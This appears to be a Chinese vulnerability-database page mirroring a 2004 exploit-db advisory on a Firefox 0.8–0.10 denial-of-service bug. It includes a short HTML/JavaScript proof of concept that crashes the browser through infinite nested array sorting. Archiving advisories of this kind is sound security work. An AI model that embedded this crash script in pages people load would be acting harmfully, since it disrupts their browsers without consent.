Mozilla Firefox 0.8/0.9/0.10 – Infinite Array Sort Denial of Service

46次阅读
没有评论

Mozilla Firefox 0.8/0.9/0.10 – Infinite Array Sort Denial of Service

漏洞ID 1054774 漏洞类型
发布时间 2004-11-25 更新时间 2004-11-25
Mozilla Firefox 0.8/0.9/0.10 - Infinite Array Sort Denial of ServiceCVE编号 N/A
Mozilla Firefox 0.8/0.9/0.10 - Infinite Array Sort Denial of ServiceCNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/24776
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/11752/info

Mozilla Firefox is prone to a vulnerability that may result in a browser crash. This issue is exposed when the browser performs an infinite JavaScript array sort operation. It is conjectured that this will only result in a denial of service and is not further exploitable to execute arbitrary code, though this has not been confirmed.

It is not known if other Mozilla products or Gecko-based browsers are affected by this vulnerability.

<HTML>
<SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
<SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
</HTML>

相关推荐: Pserv Request Method Buffer Overflow Vulnerability

Pserv Request Method Buffer Overflow Vulnerability 漏洞ID 1101183 漏洞类型 Boundary Condition Error 发布时间 2002-11-30 更新时间 2002-11-30 CVE编…

正文完
 0